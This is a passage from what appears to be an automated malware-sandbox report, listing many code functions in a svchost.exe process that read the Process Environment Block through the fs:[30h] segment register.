              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F50310 mov ecx, dword ptr fs:[00000030h]1_2_02F50310
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A30B mov eax, dword ptr fs:[00000030h]1_2_02F6A30B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A30B mov eax, dword ptr fs:[00000030h]1_2_02F6A30B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A30B mov eax, dword ptr fs:[00000030h]1_2_02F6A30B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2C0F0 mov eax, dword ptr fs:[00000030h]1_2_02F2C0F0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F720F0 mov ecx, dword ptr fs:[00000030h]1_2_02F720F0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2A0E3 mov ecx, dword ptr fs:[00000030h]1_2_02F2A0E3
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F380E9 mov eax, dword ptr fs:[00000030h]1_2_02F380E9
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB60E0 mov eax, dword ptr fs:[00000030h]1_2_02FB60E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB20DE mov eax, dword ptr fs:[00000030h]1_2_02FB20DE
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF60B8 mov eax, dword ptr fs:[00000030h]1_2_02FF60B8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF60B8 mov ecx, dword ptr fs:[00000030h]1_2_02FF60B8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F280A0 mov eax, dword ptr fs:[00000030h]1_2_02F280A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC80A8 mov eax, dword ptr fs:[00000030h]1_2_02FC80A8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004164 mov eax, dword ptr fs:[00000030h]1_2_03004164
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004164 mov eax, dword ptr fs:[00000030h]1_2_03004164
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3208A mov eax, dword ptr fs:[00000030h]1_2_02F3208A
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5C073 mov eax, dword ptr fs:[00000030h]1_2_02F5C073
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F32050 mov eax, dword ptr fs:[00000030h]1_2_02F32050
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB6050 mov eax, dword ptr fs:[00000030h]1_2_02FB6050
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC6030 mov eax, dword ptr fs:[00000030h]1_2_02FC6030
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2A020 mov eax, dword ptr fs:[00000030h]1_2_02F2A020
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2C020 mov eax, dword ptr fs:[00000030h]1_2_02F2C020
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4E016 mov eax, dword ptr fs:[00000030h]1_2_02F4E016
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4E016 mov eax, dword ptr fs:[00000030h]1_2_02F4E016
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4E016 mov eax, dword ptr fs:[00000030h]1_2_02F4E016
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4E016 mov eax, dword ptr fs:[00000030h]1_2_02F4E016
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030061E5 mov eax, dword ptr fs:[00000030h]1_2_030061E5
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB4000 mov ecx, dword ptr fs:[00000030h]1_2_02FB4000
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD2000 mov eax, dword ptr fs:[00000030h]1_2_02FD2000
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD2000 mov eax, dword ptr fs:[00000030h]1_2_02FD2000
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD2000 mov eax, dword ptr fs:[00000030h]1_2_02FD2000
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD2000 mov eax, dword ptr fs:[00000030h]1_2_02FD2000
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD2000 mov eax, dword ptr fs:[00000030h]1_2_02FD2000
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD2000 mov eax, dword ptr fs:[00000030h]1_2_02FD2000
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD2000 mov eax, dword ptr fs:[00000030h]1_2_02FD2000
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD2000 mov eax, dword ptr fs:[00000030h]1_2_02FD2000
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F601F8 mov eax, dword ptr fs:[00000030h]1_2_02F601F8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]1_2_02FAE1D0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]1_2_02FAE1D0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE1D0 mov ecx, dword ptr fs:[00000030h]1_2_02FAE1D0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]1_2_02FAE1D0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]1_2_02FAE1D0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF61C3 mov eax, dword ptr fs:[00000030h]1_2_02FF61C3
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF61C3 mov eax, dword ptr fs:[00000030h]1_2_02FF61C3
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB019F mov eax, dword ptr fs:[00000030h]1_2_02FB019F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB019F mov eax, dword ptr fs:[00000030h]1_2_02FB019F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB019F mov eax, dword ptr fs:[00000030h]1_2_02FB019F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB019F mov eax, dword ptr fs:[00000030h]1_2_02FB019F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2A197 mov eax, dword ptr fs:[00000030h]1_2_02F2A197
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2A197 mov eax, dword ptr fs:[00000030h]1_2_02F2A197
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2A197 mov eax, dword ptr fs:[00000030h]1_2_02F2A197
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F70185 mov eax, dword ptr fs:[00000030h]1_2_02F70185
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEC188 mov eax, dword ptr fs:[00000030h]1_2_02FEC188
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEC188 mov eax, dword ptr fs:[00000030h]1_2_02FEC188
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD4180 mov eax, dword ptr fs:[00000030h]1_2_02FD4180
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD4180 mov eax, dword ptr fs:[00000030h]1_2_02FD4180
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2C156 mov eax, dword ptr fs:[00000030h]1_2_02F2C156
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC8158 mov eax, dword ptr fs:[00000030h]1_2_02FC8158
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36154 mov eax, dword ptr fs:[00000030h]1_2_02F36154
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36154 mov eax, dword ptr fs:[00000030h]1_2_02F36154
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC4144 mov eax, dword ptr fs:[00000030h]1_2_02FC4144
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC4144 mov eax, dword ptr fs:[00000030h]1_2_02FC4144
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC4144 mov ecx, dword ptr fs:[00000030h]1_2_02FC4144
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC4144 mov eax, dword ptr fs:[00000030h]1_2_02FC4144
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC4144 mov eax, dword ptr fs:[00000030h]1_2_02FC4144
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F60124 mov eax, dword ptr fs:[00000030h]1_2_02F60124
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDA118 mov ecx, dword ptr fs:[00000030h]1_2_02FDA118
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDA118 mov eax, dword ptr fs:[00000030h]1_2_02FDA118
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDA118 mov eax, dword ptr fs:[00000030h]1_2_02FDA118
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDA118 mov eax, dword ptr fs:[00000030h]1_2_02FDA118
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF0115 mov eax, dword ptr fs:[00000030h]1_2_02FF0115
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE10E mov eax, dword ptr fs:[00000030h]1_2_02FDE10E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE10E mov ecx, dword ptr fs:[00000030h]1_2_02FDE10E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE10E mov eax, dword ptr fs:[00000030h]1_2_02FDE10E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE10E mov eax, dword ptr fs:[00000030h]1_2_02FDE10E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE10E mov ecx, dword ptr fs:[00000030h]1_2_02FDE10E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE10E mov eax, dword ptr fs:[00000030h]1_2_02FDE10E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE10E mov eax, dword ptr fs:[00000030h]1_2_02FDE10E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE10E mov ecx, dword ptr fs:[00000030h]1_2_02FDE10E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE10E mov eax, dword ptr fs:[00000030h]1_2_02FDE10E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE10E mov ecx, dword ptr fs:[00000030h]1_2_02FDE10E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]1_2_02FAE6F2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]1_2_02FAE6F2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]1_2_02FAE6F2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]1_2_02FAE6F2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB06F1 mov eax, dword ptr fs:[00000030h]1_2_02FB06F1
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB06F1 mov eax, dword ptr fs:[00000030h]1_2_02FB06F1
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A6C7 mov ebx, dword ptr fs:[00000030h]1_2_02F6A6C7
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A6C7 mov eax, dword ptr fs:[00000030h]1_2_02F6A6C7
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F666B0 mov eax, dword ptr fs:[00000030h]1_2_02F666B0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6C6A6 mov eax, dword ptr fs:[00000030h]1_2_02F6C6A6
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F34690 mov eax, dword ptr fs:[00000030h]1_2_02F34690
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F34690 mov eax, dword ptr fs:[00000030h]1_2_02F34690
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F62674 mov eax, dword ptr fs:[00000030h]1_2_02F62674
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF866E mov eax, dword ptr fs:[00000030h]1_2_02FF866E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF866E mov eax, dword ptr fs:[00000030h]1_2_02FF866E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A660 mov eax, dword ptr fs:[00000030h]1_2_02F6A660
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A660 mov eax, dword ptr fs:[00000030h]1_2_02F6A660
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4C640 mov eax, dword ptr fs:[00000030h]1_2_02F4C640
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4E627 mov eax, dword ptr fs:[00000030h]1_2_02F4E627
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F66620 mov eax, dword ptr fs:[00000030h]1_2_02F66620
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F68620 mov eax, dword ptr fs:[00000030h]1_2_02F68620
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3262C mov eax, dword ptr fs:[00000030h]1_2_02F3262C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72619 mov eax, dword ptr fs:[00000030h]1_2_02F72619
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE609 mov eax, dword ptr fs:[00000030h]1_2_02FAE609
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4260B mov eax, dword ptr fs:[00000030h]1_2_02F4260B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4260B mov eax, dword ptr fs:[00000030h]1_2_02F4260B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4260B mov eax, dword ptr fs:[00000030h]1_2_02F4260B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4260B mov eax, dword ptr fs:[00000030h]1_2_02F4260B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4260B mov eax, dword ptr fs:[00000030h]1_2_02F4260B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4260B mov eax, dword ptr fs:[00000030h]1_2_02F4260B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4260B mov eax, dword ptr fs:[00000030h]1_2_02F4260B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F347FB mov eax, dword ptr fs:[00000030h]1_2_02F347FB
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F347FB mov eax, dword ptr fs:[00000030h]1_2_02F347FB
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F527ED mov eax, dword ptr fs:[00000030h]1_2_02F527ED
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F527ED mov eax, dword ptr fs:[00000030h]1_2_02F527ED
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F527ED mov eax, dword ptr fs:[00000030h]1_2_02F527ED
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBE7E1 mov eax, dword ptr fs:[00000030h]1_2_02FBE7E1
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3C7C0 mov eax, dword ptr fs:[00000030h]1_2_02F3C7C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB07C3 mov eax, dword ptr fs:[00000030h]1_2_02FB07C3
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F307AF mov eax, dword ptr fs:[00000030h]1_2_02F307AF
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE47A0 mov eax, dword ptr fs:[00000030h]1_2_02FE47A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD678E mov eax, dword ptr fs:[00000030h]1_2_02FD678E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F38770 mov eax, dword ptr fs:[00000030h]1_2_02F38770
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F30750 mov eax, dword ptr fs:[00000030h]1_2_02F30750
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBE75D mov eax, dword ptr fs:[00000030h]1_2_02FBE75D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72750 mov eax, dword ptr fs:[00000030h]1_2_02F72750
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72750 mov eax, dword ptr fs:[00000030h]1_2_02F72750
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB4755 mov eax, dword ptr fs:[00000030h]1_2_02FB4755
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6674D mov esi, dword ptr fs:[00000030h]1_2_02F6674D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6674D mov eax, dword ptr fs:[00000030h]1_2_02F6674D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6674D mov eax, dword ptr fs:[00000030h]1_2_02F6674D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6273C mov eax, dword ptr fs:[00000030h]1_2_02F6273C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6273C mov ecx, dword ptr fs:[00000030h]1_2_02F6273C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6273C mov eax, dword ptr fs:[00000030h]1_2_02F6273C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAC730 mov eax, dword ptr fs:[00000030h]1_2_02FAC730
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6C720 mov eax, dword ptr fs:[00000030h]1_2_02F6C720
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6C720 mov eax, dword ptr fs:[00000030h]1_2_02F6C720
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F30710 mov eax, dword ptr fs:[00000030h]1_2_02F30710
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F60710 mov eax, dword ptr fs:[00000030h]1_2_02F60710
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6C700 mov eax, dword ptr fs:[00000030h]1_2_02F6C700
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004500 mov eax, dword ptr fs:[00000030h]1_2_03004500
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004500 mov eax, dword ptr fs:[00000030h]1_2_03004500
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004500 mov eax, dword ptr fs:[00000030h]1_2_03004500
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004500 mov eax, dword ptr fs:[00000030h]1_2_03004500
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004500 mov eax, dword ptr fs:[00000030h]1_2_03004500
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004500 mov eax, dword ptr fs:[00000030h]1_2_03004500
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004500 mov eax, dword ptr fs:[00000030h]1_2_03004500
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F304E5 mov ecx, dword ptr fs:[00000030h]1_2_02F304E5
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F644B0 mov ecx, dword ptr fs:[00000030h]1_2_02F644B0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBA4B0 mov eax, dword ptr fs:[00000030h]1_2_02FBA4B0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F364AB mov eax, dword ptr fs:[00000030h]1_2_02F364AB
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEA49A mov eax, dword ptr fs:[00000030h]1_2_02FEA49A
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5A470 mov eax, dword ptr fs:[00000030h]1_2_02F5A470
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5A470 mov eax, dword ptr fs:[00000030h]1_2_02F5A470
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5A470 mov eax, dword ptr fs:[00000030h]1_2_02F5A470
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBC460 mov ecx, dword ptr fs:[00000030h]1_2_02FBC460
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEA456 mov eax, dword ptr fs:[00000030h]1_2_02FEA456
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2645D mov eax, dword ptr fs:[00000030h]1_2_02F2645D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5245A mov eax, dword ptr fs:[00000030h]1_2_02F5245A
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E443 mov eax, dword ptr fs:[00000030h]1_2_02F6E443
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E443 mov eax, dword ptr fs:[00000030h]1_2_02F6E443
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E443 mov eax, dword ptr fs:[00000030h]1_2_02F6E443
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E443 mov eax, dword ptr fs:[00000030h]1_2_02F6E443
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F6E443 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F2E420 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F2C427 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FB6420 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F68402 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F325E0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F6C5ED mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F365D0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F6A5D0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F6E5CF mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F545B1 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FB05A7 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F6E59C mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F32582 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F32582 mov ecx, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F64588 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F6656A mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F38550 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F40535 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F5E53E mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FC6500 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03004B00 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F6AAEE mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F30AD0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F64AD0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F86ACC mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F38AA0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03002B57 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F86AA4 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F68A90 mov edx, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FACA72 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F6CA6F mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FDEA60 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F40A5B mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F54A35 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F6CA24 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F5EA2E mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FBCA11 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F38BF0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F5EBFC mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FBCBF0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FDEBD0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F50BCB mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F30BCD mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F40BBE mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FE4BB0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03004A80 mov eax, dword ptr fs:[00000030h]
